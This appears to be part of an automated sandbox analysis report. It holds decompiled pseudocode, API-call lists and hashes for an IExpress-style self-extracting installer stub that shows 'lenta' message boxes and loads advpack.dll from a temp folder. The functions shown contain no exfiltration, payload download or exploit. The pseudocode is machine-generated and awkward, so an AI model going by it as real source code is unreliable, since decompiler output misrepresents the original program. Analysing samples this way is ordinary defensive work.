                                                                      							_v436 = E00F82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                      							_t91 = E00F82A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                      							_t123 = _v436;
                                                                      							_t133 = 0x54d;
                                                                      							__eflags = _t123;
                                                                      							if(_t123 < 0) {
                                                                      								L32:
                                                                      								__eflags = _v420 - 1;
                                                                      								if(_v420 == 1) {
                                                                      									_t138 = 0x54c;
                                                                      									L36:
                                                                      									__eflags = _t138;
                                                                      									if(_t138 != 0) {
                                                                      										L40:
                                                                      										__eflags = _t138 - _t133;
                                                                      										if(_t138 == _t133) {
                                                                      											L30:
                                                                      											_v420 = _v420 & 0x00000000;
                                                                      											_t115 = 0;
                                                                      											_v436 = _v436 & 0x00000000;
                                                                      											__eflags = _t138 - _t133;
                                                                      											_t133 = _v432;
                                                                      											if(__eflags != 0) {
                                                                      												_t124 = _v440;
                                                                      											} else {
                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                      												_v420 =  &_v268;
                                                                      											}
                                                                      											__eflags = _t124;
                                                                      											if(_t124 == 0) {
                                                                      												_t135 = _v436;
                                                                      											} else {
                                                                      												_t99 = _t124[0x30];
                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                      												__eflags = _t99 & 0x00000001;
                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                      													asm("sbb ebx, ebx");
                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                      												} else {
                                                                      													_t115 = 0x104;
                                                                      												}
                                                                      											}
                                                                      											__eflags =  *0xf88a38 & 0x00000001;
                                                                      											if(( *0xf88a38 & 0x00000001) != 0) {
                                                                      												L64:
                                                                      												_push(0);
                                                                      												_push(0x30);
                                                                      												_push(_v420);
                                                                      												_push("lenta");
                                                                      												goto L65;
                                                                      											} else {
                                                                      												__eflags = _t135;
                                                                      												if(_t135 == 0) {
                                                                      													goto L64;
                                                                      												}
                                                                      												__eflags =  *_t135;
                                                                      												if( *_t135 == 0) {
                                                                      													goto L64;
                                                                      												}
                                                                      												MessageBeep(0);
                                                                      												_t94 = E00F8681F(_t115);
                                                                      												__eflags = _t94;
                                                                      												if(_t94 == 0) {
                                                                      													L57:
                                                                      													0x180030 = 0x30;
                                                                      													L58:
                                                                      													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                      													__eflags = _t115 & 0x00000004;
                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                      														__eflags = _t115 & 0x00000001;
                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                      															goto L66;
                                                                      														}
                                                                      														__eflags = _t97 - 1;
                                                                      														L62:
                                                                      														if(__eflags == 0) {
                                                                      															_t138 = 0;
                                                                      														}
                                                                      														goto L66;
                                                                      													}
                                                                      													__eflags = _t97 - 6;
                                                                      													goto L62;
                                                                      												}
                                                                      												_t98 = E00F867C9(_t124, _t124);
                                                                      												__eflags = _t98;
                                                                      												if(_t98 == 0) {
                                                                      													goto L57;
                                                                      												}
                                                                      												goto L58;
                                                                      											}
                                                                      										}
                                                                      										__eflags = _t138 - 0x54c;
                                                                      										if(_t138 == 0x54c) {
                                                                      											goto L30;
                                                                      										}
                                                                      										__eflags = _t138;
                                                                      										if(_t138 == 0) {
                                                                      											goto L66;
                                                                      										}
                                                                      										_t135 = 0;
                                                                      										__eflags = 0;
                                                                      										goto L44;
                                                                      									}
                                                                      									L37:
                                                                      									_t129 = _v432;
                                                                      									__eflags = _t129[0x7c];
                                                                      									if(_t129[0x7c] == 0) {
                                                                      										goto L66;
                                                                      									}
                                                                      									_t133 =  &_v268;
                                                                      									_t104 = E00F828E8(_t129,  &_v268, _t129,  &_v428);
                                                                      									__eflags = _t104;
                                                                      									if(_t104 != 0) {
                                                                      										goto L66;
                                                                      									}
                                                                      									_t135 = _v428;
                                                                      									_t133 = 0x54d;
                                                                      									_t138 = 0x54d;
                                                                      									goto L40;
                                                                      								}
                                                                      								goto L33;
                                                                      							}
                                                                      							__eflags = _t91;
                                                                      							if(_t91 > 0) {
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags = _t123;
                                                                      							if(_t123 != 0) {
                                                                      								__eflags = _t91;
                                                                      								if(_t91 != 0) {
                                                                      									goto L37;
                                                                      								}
                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                      								L27:
                                                                      								if(__eflags <= 0) {
                                                                      									goto L37;
                                                                      								}
                                                                      								L28:
                                                                      								__eflags = _t135;
                                                                      								if(_t135 == 0) {
                                                                      									goto L33;
                                                                      								}
                                                                      								_t138 = 0x54c;
                                                                      								goto L30;
                                                                      							}
                                                                      							__eflags = _t91;
                                                                      							_t107 = _v416.dwBuildNumber;
                                                                      							if(_t91 != 0) {
                                                                      								_t131 = _v424;
                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                      									goto L37;
                                                                      								}
                                                                      								goto L28;
                                                                      							}
                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                      							_t109 = _v424;
                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                      								goto L28;
                                                                      							}
                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                      							goto L27;
                                                                      							L33:
                                                                      							_t135 =  &(_t135[1]);
                                                                      							_v428 = _t135;
                                                                      							_v420 = _t135;
                                                                      							__eflags = _t135 - 2;
                                                                      						} while (_t135 < 2);
                                                                      						goto L36;
                                                                      					}
                                                                      					__eflags = _t77 == 1;
                                                                      					if(_t77 == 1) {
                                                                      						 *0xf89a40 = _t119;
                                                                      						 *0xf88184 = 1;
                                                                      						 *0xf88180 = 1;
                                                                      						__eflags = _t133 - 3;
                                                                      						if(_t133 > 3) {
                                                                      							__eflags = _t133 - 5;
                                                                      							if(_t133 < 5) {
                                                                      								goto L14;
                                                                      							}
                                                                      							_t113 = 3;
                                                                      							_t119 = _t113;
                                                                      							goto L13;
                                                                      						}
                                                                      						_t119 = 1;
                                                                      						_t114 = 3;
                                                                      						 *0xf89a40 = 1;
                                                                      						__eflags = _t133 - _t114;
                                                                      						if(__eflags < 0) {
                                                                      							L9:
                                                                      							 *0xf88184 = _t135;
                                                                      							 *0xf88180 = _t135;
                                                                      							goto L14;
                                                                      						}
                                                                      						if(__eflags != 0) {
                                                                      							goto L14;
                                                                      						}
                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                      							goto L14;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					_t138 = 0x4ca;
                                                                      					goto L44;
                                                                      				} else {
                                                                      					_t138 = 0x4b4;
                                                                      					L44:
                                                                      					_push(_t135);
                                                                      					_push(0x10);
                                                                      					_push(_t135);
                                                                      					_push(_t135);
                                                                      					L65:
                                                                      					_t133 = _t138;
                                                                      					E00F844B9(0, _t138);
                                                                      					L66:
                                                                      					return E00F86CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00F83723
                                                                      • MessageBeep.USER32(00000000), ref: 00F839C3
                                                                      • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00F839F1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Message$BeepVersion
                                                                      • String ID: 3$lenta
                                                                      • API String ID: 2519184315-4216304122
                                                                      • Opcode ID: bc4ea0b4fdbae60a60ef70d81da975e87d2377fba5bf0ec79ae39892cb604d23
                                                                      • Instruction ID: a84a42f266a296e942f95631901a245c3bf68cd370f64b860fa3b22ee86448d4
                                                                      • Opcode Fuzzy Hash: bc4ea0b4fdbae60a60ef70d81da975e87d2377fba5bf0ec79ae39892cb604d23
                                                                      • Instruction Fuzzy Hash: 8991E472F052249BDB38AA14CC817FA77A1EB45B14F1500A9D88997261DB788F81FB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E00F86495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __edi;
                                                                      				signed int _t9;
                                                                      				signed char _t14;
                                                                      				struct HINSTANCE__* _t15;
                                                                      				void* _t18;
                                                                      				CHAR* _t26;
                                                                      				void* _t27;
                                                                      				signed int _t28;
                                                                      
                                                                      				_t27 = __esi;
                                                                      				_t18 = __ebx;
                                                                      				_t9 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t9 ^ _t28;
                                                                      				_push(__ecx);
                                                                      				E00F81781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      				_t26 = "advpack.dll";
                                                                      				E00F8658A( &_v268, 0x104, _t26);
                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                      					_t15 = LoadLibraryA(_t26);
                                                                      				} else {
                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                      				}
                                                                      				return E00F86CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                      			}

                                                                      APIs
                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F864DF
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F864F9
                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F86502
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$AttributesFile
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                      • API String ID: 438848745-3761280616
                                                                      • Opcode ID: 25f828de1793c4fe06fdd23dd05d91fd67ad02a61b0d95d9e8ad72aad51b85ed
                                                                      • Instruction ID: 422cb36fd2efdf1091799ef5b672aea7aa096302c1fd9b6d11b27a741f173b45
                                                                      • Opcode Fuzzy Hash: 25f828de1793c4fe06fdd23dd05d91fd67ad02a61b0d95d9e8ad72aad51b85ed
                                                                      • Instruction Fuzzy Hash: 5E01D130A04108ABEB10FB64DC49AFE7778EB50310F50029AF585D61C0DFB4AE8AAB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                      				void* _v8;
                                                                      				char* _v12;
                                                                      				intOrPtr _v16;
                                                                      				void* _v20;
                                                                      				intOrPtr _v24;
                                                                      				int _v28;
                                                                      				int _v32;
                                                                      				void* _v36;
                                                                      				int _v40;
                                                                      				void* _v44;
                                                                      				intOrPtr _v48;
                                                                      				intOrPtr _v52;
                                                                      				intOrPtr _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr _v64;
                                                                      				long _t68;
                                                                      				void* _t70;
                                                                      				void* _t73;
                                                                      				void* _t79;
                                                                      				void* _t83;
                                                                      				void* _t87;
                                                                      				void* _t88;
                                                                      				intOrPtr _t93;
                                                                      				intOrPtr _t97;
                                                                      				intOrPtr _t99;
                                                                      				int _t101;
                                                                      				void* _t103;
                                                                      				void* _t106;
                                                                      				void* _t109;
                                                                      				void* _t110;
                                                                      
                                                                      				_v12 = __edx;
                                                                      				_t99 = __ecx;
                                                                      				_t106 = 0;
                                                                      				_v16 = __ecx;
                                                                      				_t87 = 0;
                                                                      				_t103 = 0;
                                                                      				_v20 = 0;
                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                      					L19:
                                                                      					_t106 = 1;
                                                                      				} else {
                                                                      					_t62 = 0;
                                                                      					_v8 = 0;
                                                                      					while(1) {
                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                      						if(E00F82773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                      							goto L20;
                                                                      						}
                                                                      						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                      						_v28 = _t68;
                                                                      						if(_t68 == 0) {
                                                                      							_t99 = _v16;
                                                                      							_t70 = _v8 + _t99;
                                                                      							_t93 = _v24;
                                                                      							_t87 = _v20;
                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                      								goto L18;
                                                                      							}
                                                                      						} else {
                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                      							if(_t103 != 0) {
                                                                      								_t73 = GlobalLock(_t103);
                                                                      								_v36 = _t73;
                                                                      								if(_t73 != 0) {
                                                                      									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                      										L15:
                                                                      										GlobalUnlock(_t103);
                                                                      										_t99 = _v16;
                                                                      										L18:
                                                                      										_t87 = _t87 + 1;
                                                                      										_t62 = _v8 + 0x3c;
                                                                      										_v20 = _t87;
                                                                      										_v8 = _v8 + 0x3c;
                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                      											continue;
                                                                      										} else {
                                                                      											goto L19;
                                                                      										}
                                                                      									} else {
                                                                      										_t79 = _v44;
                                                                      										_t88 = _t106;
                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                      										_t101 = _v28;
                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                      										_t97 = _v48;
                                                                      										_v36 = _t83;
                                                                      										_t109 = _t83;
                                                                      										do {
                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00F82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00F82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                      											_t109 = _t109 + 0x18;
                                                                      											_t88 = _t88 + 4;
                                                                      										} while (_t88 < 8);
                                                                      										_t87 = _v20;
                                                                      										_t106 = 0;
                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                      												GlobalUnlock(_t103);
                                                                      											} else {
                                                                      												goto L15;
                                                                      											}
                                                                      										} else {
                                                                      											goto L15;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L20;
                                                                      					}
                                                                      				}
                                                                      				L20:
                                                                      				 *_a8 = _t87;
                                                                      				if(_t103 != 0) {
                                                                      					GlobalFree(_t103);
                                                                      				}
                                                                      				return _t106;
                                                                      			}

                                                                      APIs
                                                                      • GlobalFree.KERNEL32 ref: 00F82A6F
                                                                        • Part of subcall function 00F82773: CharUpperA.USER32(644C7055,00000000,00000000,00000000), ref: 00F827A8
                                                                        • Part of subcall function 00F82773: CharNextA.USER32(0000054D), ref: 00F827B5
                                                                        • Part of subcall function 00F82773: CharNextA.USER32(00000000), ref: 00F827BC
                                                                        • Part of subcall function 00F82773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82829
                                                                        • Part of subcall function 00F82773: RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82852
                                                                        • Part of subcall function 00F82773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82870
                                                                        • Part of subcall function 00F82773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F828A0
                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00F83938,?,?,?,?,-00000005), ref: 00F82958
                                                                      • GlobalLock.KERNEL32 ref: 00F82969
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F83938,?,?,?,?,-00000005,?), ref: 00F82A21
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00F82A81
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                      • String ID:
                                                                      • API String ID: 3949799724-0
                                                                      • Opcode ID: f2d24d31c5c12a47ea6015d1efa44e206089a8454ff481bc2c70d49a05e9aca9
                                                                      • Instruction ID: 7199bdf0d8b76b11d604cbb09567959cc1db4374a21e72e45db5e0f3d68654ca
                                                                      • Opcode Fuzzy Hash: f2d24d31c5c12a47ea6015d1efa44e206089a8454ff481bc2c70d49a05e9aca9
                                                                      • Instruction Fuzzy Hash: 83511731E00219DBDB65EF98C884AEEFBB5FF48710F14416AE905E3211DB39A941EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 32%
                                                                      			E00F84169(void* __eflags) {
                                                                      				int _t18;
                                                                      				void* _t21;
                                                                      
                                                                      				_t20 = E00F8468F("FINISHMSG", 0, 0);
                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                      				if(_t21 != 0) {
                                                                      					if(E00F8468F("FINISHMSG", _t21, _t20) != 0) {
                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                      							L7:
                                                                      							return LocalFree(_t21);
                                                                      						}
                                                                      						_push(0);
                                                                      						_push(0x40);
                                                                      						_push(0);
                                                                      						_push(_t21);
                                                                      						_t18 = 0x3e9;
                                                                      						L6:
                                                                      						E00F844B9(0, _t18);
                                                                      						goto L7;
                                                                      					}
                                                                      					_push(0);
                                                                      					_push(0x10);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_t18 = 0x4b1;
                                                                      					goto L6;
                                                                      				}
                                                                      				return E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      			}





                                                                      APIs
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00F830B4), ref: 00F84189
                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00F830B4), ref: 00F841E7
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                      • String ID: <None>$FINISHMSG
                                                                      • API String ID: 3507850446-3091758298
                                                                      • Opcode ID: cd98b4a69be770c8d456550efe61bde9fd973d8ad93b4ca6142e9bfc4de7cfd6
                                                                      • Instruction ID: 7c3926e369d0412d9f3d01b02b4c6005726a317d1cbe4c0f99adba1cf497fadb
                                                                      • Opcode Fuzzy Hash: cd98b4a69be770c8d456550efe61bde9fd973d8ad93b4ca6142e9bfc4de7cfd6
                                                                      • Instruction Fuzzy Hash: 5501F4B270061A7BF72576654C8AFFB718EEBD47A5F104126B705E1180DA6CEC017375
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E00F819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                      				signed int _v8;
                                                                      				char _v520;
                                                                      				void* __esi;
                                                                      				signed int _t11;
                                                                      				void* _t14;
                                                                      				void* _t23;
                                                                      				void* _t27;
                                                                      				void* _t33;
                                                                      				struct HWND__* _t34;
                                                                      				signed int _t35;
                                                                      
                                                                      				_t33 = __edi;
                                                                      				_t27 = __ebx;
                                                                      				_t11 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t11 ^ _t35;
                                                                      				_t34 = _a4;
                                                                      				_t14 = _a8 - 0x110;
                                                                      				if(_t14 == 0) {
                                                                      					_t32 = GetDesktopWindow();
                                                                      					E00F843D0(_t34, _t15);
                                                                      					_v520 = 0;
                                                                      					LoadStringA( *0xf89a3c, _a16,  &_v520, 0x200);
                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                      					MessageBeep(0xffffffff);
                                                                      					goto L6;
                                                                      				} else {
                                                                      					if(_t14 != 1) {
                                                                      						L4:
                                                                      						_t23 = 0;
                                                                      					} else {
                                                                      						_t32 = _a12;
                                                                      						if(_t32 - 0x83d > 1) {
                                                                      							goto L4;
                                                                      						} else {
                                                                      							EndDialog(_t34, _t32);
                                                                      							L6:
                                                                      							_t23 = 1;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                      			}













                                                                      APIs
                                                                      • EndDialog.USER32(?,?), ref: 00F81A18
                                                                      • GetDesktopWindow.USER32 ref: 00F81A24
                                                                      • LoadStringA.USER32(?,?,00000200), ref: 00F81A4F
                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00F81A62
                                                                      • MessageBeep.USER32(000000FF), ref: 00F81A6A
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1273765764-0
                                                                      • Opcode ID: 28ecd766ccc60a13b16ff024420d6c87e00a968074fad86b109138b0773a7442
                                                                      • Instruction ID: 728c2fc31c5987c2fc8373e8d54faa30cb4d805b32f67f0ffb9b1a6be94f2d0a
                                                                      • Opcode Fuzzy Hash: 28ecd766ccc60a13b16ff024420d6c87e00a968074fad86b109138b0773a7442
                                                                      • Instruction Fuzzy Hash: DC11CE3150010DABDB04EF64DD48AFE77B8FB09310F108255F92292190DA349E02FB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F87155() {
                                                                      				void* _v8;
                                                                      				struct _FILETIME _v16;
                                                                      				signed int _v20;
                                                                      				union _LARGE_INTEGER _v24;
                                                                      				signed int _t23;
                                                                      				signed int _t36;
                                                                      				signed int _t37;
                                                                      				signed int _t39;
                                                                      
                                                                      				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                      				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                      				_t23 =  *0xf88004; // 0x644c7055
                                                                      				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                      					GetSystemTimeAsFileTime( &_v16);
                                                                      					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                      					_v8 = _v8 ^ GetCurrentProcessId();
                                                                      					_v8 = _v8 ^ GetCurrentThreadId();
                                                                      					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                      					QueryPerformanceCounter( &_v24);
                                                                      					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                      					_t39 = _t36;
                                                                      					if(_t36 == 0xbb40e64e || ( *0xf88004 & 0xffff0000) == 0) {
                                                                      						_t36 = 0xbb40e64f;
                                                                      						_t39 = 0xbb40e64f;
                                                                      					}
                                                                      					 *0xf88004 = _t39;
                                                                      				}
                                                                      				_t37 =  !_t36;
                                                                      				 *0xf88008 = _t37;
                                                                      				return _t37;
                                                                      			}











                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F87182
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00F87191
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00F8719A
                                                                      • GetTickCount.KERNEL32 ref: 00F871A3
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00F871B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
